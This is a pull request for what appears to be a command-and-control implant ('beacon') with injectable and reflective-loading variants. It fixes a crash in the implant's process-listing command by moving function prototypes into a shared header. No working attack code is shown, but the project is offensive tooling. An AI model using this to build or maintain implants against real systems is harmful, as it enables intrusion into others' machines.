### PR TITLE
Issue 35 ps crashes powershell beacon

### DIFF
--- a/beacon/injectable/core.c
+++ b/beacon/injectable/core.c
@@ -26,6 +26,9 @@
 
 #include "settings.h"
 
+// include stdlib function prototypes
+#include "../lib/stdlib/stdlib.h"
+
 // core functions
 BOOL GetBasicUserInfo(struct BasicUserInfo *UserInfo)
 {

--- a/beacon/injectable/core.h
+++ b/beacon/injectable/core.h
@@ -16,14 +16,6 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
 LPVOID DieCleanly();
 LPVOID CheckIfDie(LPCWSTR *ReadBuffer);
 
-char* listdirs(LPCSTR szDir);
-char* readfile(char* szFile);
-char* makedirectory(char* szDirName);
-char* removefile(char* szFileName);
-char* getdir();
-char* changedir(char* Dir);
-char* getpid();
-
 LPVOID ReportExecutionFail();
 
 char* decrypt_string(char* string, int key);

--- a/beacon/lib/stdlib/stdlib.h
+++ b/beacon/lib/stdlib/stdlib.h
@@ -1,0 +1,11 @@
+#include <windows.h>
+
+char* changedir(char* Dir);
+char* getdir();
+char* getpid();
+char* getps();
+char* listdirs(char* Dir);
+char* makedirectory(char* szDirName);
+char* readfile(char* szFile);
+char* removefile(char* szFileName);
+char* whoami(BOOL DisplayAll, char* oBuffer);

--- a/beacon/reflection/core.c
+++ b/beacon/reflection/core.c
@@ -26,6 +26,9 @@
 
 #include "settings.h"
 
+// Include stdlib function prototypes
+#include "../lib/stdlib/stdlib.h"
+
 // core functions
 BOOL GetBasicUserInfo(struct BasicUserInfo *UserInfo)
 {

--- a/beacon/reflection/core.h
+++ b/beacon/reflection/core.h
@@ -16,14 +16,6 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
 LPVOID DieCleanly();
 LPVOID CheckIfDie(LPCWSTR *ReadBuffer);
 
-char* listdirs(LPCSTR szDir);
-char* readfile(char* szFile);
-char* makedirectory(char* szDirName);
-char* removefile(char* szFileName);
-char* getdir();
-char* changedir(char* Dir);
-char* getpid();
-
 LPVOID ReportExecutionFail();
 
 char* decrypt_string(char* string, int key);

--- a/beacon/src/core.c
+++ b/beacon/src/core.c
@@ -28,6 +28,9 @@
 
 #include "settings.h"
 
+// Include stdlib function prototypes
+#include "../lib/stdlib/stdlib.h"
+
 // core functions
 BOOL GetBasicUserInfo(struct BasicUserInfo *UserInfo)
 {

--- a/beacon/src/core.h
+++ b/beacon/src/core.h
@@ -16,13 +16,6 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
 LPVOID DieCleanly();
 LPVOID CheckIfDie(LPCWSTR *ReadBuffer);
 
-char* listdirs(LPCSTR szDir);
-char* readfile(char* szFile);
-char* makedirectory(char* szDirName);
-char* removefile(char* szFileName);
-char* getdir();
-char* changedir(char* Dir);
-
 LPVOID ReportExecutionFail();
 
 char* decrypt_string(char* string, int key);


### PR DESCRIPTION
Add stdlib header with function prototypes

The PS command was crashing beacons because of data truncation as a
result of an implicit function declaration bug. This change adds a
stdlib header that defines all stdlib functions. This file can be
included by the beacons to avoid implicit function declarations

Closes #35